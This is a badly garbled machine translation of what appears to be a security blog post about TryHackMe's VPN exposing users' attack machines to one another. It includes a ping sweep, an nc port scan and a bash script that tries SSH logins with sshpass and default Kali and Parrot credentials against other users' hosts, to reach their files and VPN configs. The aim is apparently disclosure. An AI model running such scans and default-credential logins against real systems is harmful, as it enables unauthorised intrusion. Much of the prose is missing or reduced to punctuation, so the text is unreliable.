"Hack Me on TryHackMe", atau Riset keamanan informasi yang tidak aman pada platform yang dikenal

Halo, Khabrchan. Hari ini kita akan berbicara tentang satu masalah yang ditemukan oleh teman baik saya Ivan Glinkin .





Ini adalah kusen yang sangat serius dengan keamanan platform pelatihan pentest TryHackMe. Ini terdiri dari fakta bahwa dudukan virtual benar-benar melihat semua yang ada di jaringan, dan mereka dapat digunakan untuk menyerang pengguna layanan.





3 :





  1. , . TryHackMe ;





  2. , ( );





  3. .





DSCLAIMER

, . , TryHackMe, , , . .





. IT- , . , .





, , «*, *, ».





VPN , , . ? !





, ? -, , ?





! , , .





«Basic Pentesting».





Sebagai penyerang, kami memiliki ...
...

kay , , TryHackMe , . . 10.9.5.0





for ip in {1..254}; do ping -w 1 10.9.5.$ip | grep -i "ttl"; done
      
      



Kami mencari tetangga yang masih hidup

. , ? , , 10.9.4.0 …





Mencari lebih banyak

...



, ! , SSH , Apache.



IP nc 80 , nc .





for ip in $(cat ips.txt); do nc -nvw 1 $ip 80; done
      
      



Kami mencari port 80 terbuka
80

. CURL’ 10.9.4.252 www , :





Saya yakin bagi banyak orang direktori server web di Kali terlihat seperti ini
, - Kali

, SSH. . sshpass, curl, wget . , , - .





! .





Tidak ada hak.  Dan jika saya menemukannya?
. ?

root- ! root , , , kay sudo. ?





Yah, bahkan tanpa komentar ...
, …

sshpass bash :





#!/bin/bash
for ip in {2..255}
do ip_check=$(ping -w 1 10.9.5.$ip | grep -i "icmp_seq" | cut -d " " -f 4 | cut -d ":" -f 1)
if [ ! -z $ip_check ]
then
echo -e "\e[01;32mHost $ip_check is up. Cheking SSH\e[00m";
nc -vz -w 2 $ip_check 22 > log.txt 2>&1;
ssh_refused=$(grep -o "refused" log.txt)
ssh_timeout=$(grep -o "timed" log.txt)
if [ ! -z $ssh_refused ]
then
echo -e "\e[01;31mSSH is closed. Going further. \e[00m";
echo " ";
elif [ ! -z $ssh_timeout ]
then
echo -e "\e[01;31mSSH doesn't respond. Going further. \e[00m";
echo " ";
else
echo -e "\e[01;32mSSH is open. Trying to connect... \e[00m";
sshpass -p "kali" ssh -o StrictHostKeyChecking=no kali@$ip_check;
sshpass -p "toor" ssh -o StrictHostKeyChecking=no user@$ip_check;
sshpass -p "toor" ssh -o StrictHostKeyChecking=no root@$ip_check;
echo " ";
fi
fi
done
rm log.txt;
echo -e "\e[01;32mEnumeration has been finished! \e[00m";
      
      



3 / Kali Parrot OS:





  • kali:kali





  • root:toor





  • user:toor





PERGILAH!
!

«» . ovpn TryHackMe. VIP, …





Halo halo file ovpn
ovpn

sudo …





Nah, bagaimana jadinya ...
...

?





, : TryHackMe **** Kali Parrot OS . «» TryHackMe? .





, , , SSH, . , :





  1. ;





  2. ;





  3. - - IP;





  4. ( , , ?);





  5. , …





, , . , , , TryHackMe , , - .





«» TryHackMe .





TryHackMe 2 2021. 25 2021. , , TryHackMe , 9 .





TryHackMe , , . - ?





:





. , TryHackMe. , …





, , .





: 9 .





? , , TryHackMe, Kali .








All Articles